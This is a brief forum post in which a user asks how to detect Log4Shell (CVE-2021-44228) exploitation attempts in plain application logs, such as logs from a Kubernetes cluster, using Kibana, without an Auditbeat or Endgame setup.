I wonder if anyone of you guys have already tried to find possible log4shell exploit based on the logs in your elastic cluster using kibana. I am aware that this can be done using the Elastic Security as described here: Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog
But for those you must have a auditbeat or endgame infrastructure setup, which I do not have for example.
But I also think there should be a possibility to detect this vulnarability based on the plain applcation logs (for example collected from a kubernetes cluster)?
Any ideas on that how to achive this?